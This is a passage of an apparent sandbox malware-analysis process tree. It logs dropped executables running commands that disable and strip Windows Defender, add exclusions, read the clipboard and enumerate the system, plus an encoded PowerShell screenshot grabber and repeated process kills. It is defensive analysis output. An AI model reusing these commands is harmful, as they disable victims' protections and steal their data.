                                                                        • C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:3796
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI57682\Build.exe -pbeznogym
                                                                            7⤵
                                                                              PID:528
                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI57682\Build.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\_MEI57682\Build.exe -pbeznogym
                                                                                8⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1624
                                                                                • C:\ProgramData\Microsoft\hacn.exe
                                                                                  "C:\ProgramData\Microsoft\hacn.exe"
                                                                                  9⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5476
                                                                                  • C:\ProgramData\Microsoft\hacn.exe
                                                                                    "C:\ProgramData\Microsoft\hacn.exe"
                                                                                    10⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:5700
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI54762\Build.exe -pbeznogym
                                                                                      11⤵
                                                                                        PID:720
                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI54762\Build.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI54762\Build.exe -pbeznogym
                                                                                          12⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5932
                                                                                          • C:\ProgramData\Microsoft\hacn.exe
                                                                                            "C:\ProgramData\Microsoft\hacn.exe"
                                                                                            13⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:4856
                                                                                          • C:\ProgramData\Microsoft\based.exe
                                                                                            "C:\ProgramData\Microsoft\based.exe"
                                                                                            13⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5032
                                                                                            • C:\ProgramData\Microsoft\based.exe
                                                                                              "C:\ProgramData\Microsoft\based.exe"
                                                                                              14⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:6908
                                                                                  • C:\ProgramData\Microsoft\based.exe
                                                                                    "C:\ProgramData\Microsoft\based.exe"
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5564
                                                                                    • C:\ProgramData\Microsoft\based.exe
                                                                                      "C:\ProgramData\Microsoft\based.exe"
                                                                                      10⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:6440
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                        11⤵
                                                                                          PID:5132
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                            12⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:6848
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                          11⤵
                                                                                            PID:4000
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                              12⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:2880
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ​‍ .scr'"
                                                                                            11⤵
                                                                                              PID:5040
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ​‍ .scr'
                                                                                                12⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:6448
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                              11⤵
                                                                                                PID:752
                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                  tasklist /FO LIST
                                                                                                  12⤵
                                                                                                  • Enumerates processes with tasklist
                                                                                                  PID:5300
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                11⤵
                                                                                                  PID:7124
                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                    tasklist /FO LIST
                                                                                                    12⤵
                                                                                                    • Enumerates processes with tasklist
                                                                                                    PID:5472
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                  11⤵
                                                                                                    PID:764
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                      12⤵
                                                                                                        PID:5500
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                      11⤵
                                                                                                        PID:5696
                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                          tasklist /FO LIST
                                                                                                          12⤵
                                                                                                          • Enumerates processes with tasklist
                                                                                                          PID:6556
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                        11⤵
                                                                                                        • Clipboard Data
                                                                                                        PID:6452
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell Get-Clipboard
                                                                                                          12⤵
                                                                                                          • Clipboard Data
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:2620
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                        11⤵
                                                                                                          PID:3784
                                                                                                          • C:\Windows\system32\tree.com
                                                                                                            tree /A /F
                                                                                                            12⤵
                                                                                                              PID:1960
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                            11⤵
                                                                                                              PID:5448
                                                                                                              • C:\Windows\system32\systeminfo.exe
                                                                                                                systeminfo
                                                                                                                12⤵
                                                                                                                • Gathers system information
                                                                                                                PID:7472
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                              11⤵
                                                                                                                PID:3092
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                  12⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:7464
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4h3vxpgv\4h3vxpgv.cmdline"
                                                                                                                    13⤵
                                                                                                                      PID:7888
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9292.tmp" "c:\Users\Admin\AppData\Local\Temp\4h3vxpgv\CSC8F0DE00E5D994AF38DE31D35C16F2C92.TMP"
                                                                                                                        14⤵
                                                                                                                          PID:7976
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                    11⤵
                                                                                                                      PID:7480
                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                        tree /A /F
                                                                                                                        12⤵
                                                                                                                          PID:7604
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                        11⤵
                                                                                                                          PID:7776
                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                            tree /A /F
                                                                                                                            12⤵
                                                                                                                              PID:7872
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                            11⤵
                                                                                                                              PID:7924
                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                tree /A /F
                                                                                                                                12⤵
                                                                                                                                  PID:8028
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                11⤵
                                                                                                                                  PID:8080
                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                    tree /A /F
                                                                                                                                    12⤵
                                                                                                                                      PID:8152
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                    11⤵
                                                                                                                                      PID:8176
                                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                                        tree /A /F
                                                                                                                                        12⤵
                                                                                                                                          PID:4932
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5540"
                                                                                                                                        11⤵
                                                                                                                                          PID:512
                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                            taskkill /F /PID 5540
                                                                                                                                            12⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:7212
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5532"
                                                                                                                                          11⤵
                                                                                                                                            PID:1508
                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                              taskkill /F /PID 5532
                                                                                                                                              12⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:7200
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5588"
                                                                                                                                            11⤵
                                                                                                                                              PID:7248
                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                taskkill /F /PID 5588
                                                                                                                                                12⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:3496
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5572"
                                                                                                                                              11⤵
                                                                                                                                                PID:7292
                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                  taskkill /F /PID 5572
                                                                                                                                                  12⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:7444
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6272"
                                                                                                                                                11⤵
                                                                                                                                                  PID:7392
                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                    taskkill /F /PID 6272
                                                                                                                                                    12⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:7660
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6020"
                                                                                                                                                  11⤵
                                                                                                                                                    PID:1188
                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                      taskkill /F /PID 6020
                                                                                                                                                      12⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:7748
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6280"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:7484
                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                        taskkill /F /PID 6280
                                                                                                                                                        12⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:7428
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6028"
                                                                                                                                                      11⤵
                                                                                                                                                        PID:4956
                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                          taskkill /F /PID 6028
                                                                                                                                                          12⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:7836
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6308"
                                                                                                                                                        11⤵
                                                                                                                                                          PID:2368
                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                            taskkill /F /PID 6308
                                                                                                                                                            12⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:7880
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6116"
                                                                                                                                                          11⤵
                                                                                                                                                            PID:7776
                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                              taskkill /F /PID 6116
                                                                                                                                                              12⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:7984
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6648"
                                                                                                                                                            11⤵
                                                                                                                                                              PID:7972
                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                taskkill /F /PID 6648
                                                                                                                                                                12⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:5172
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1152"
                                                                                                                                                              11⤵
                                                                                                                                                                PID:4960
                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                  taskkill /F /PID 1152
                                                                                                                                                                  12⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:5468
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4876"
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:2856
                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                    taskkill /F /PID 4876
                                                                                                                                                                    12⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:5064
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:7828
                                                                                                                                                                    • C:\Windows\system32\getmac.exe
                                                                                                                                                                      getmac
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:4000
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 664"
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:640
                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                          taskkill /F /PID 664
                                                                                                                                                                          12⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:7532
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
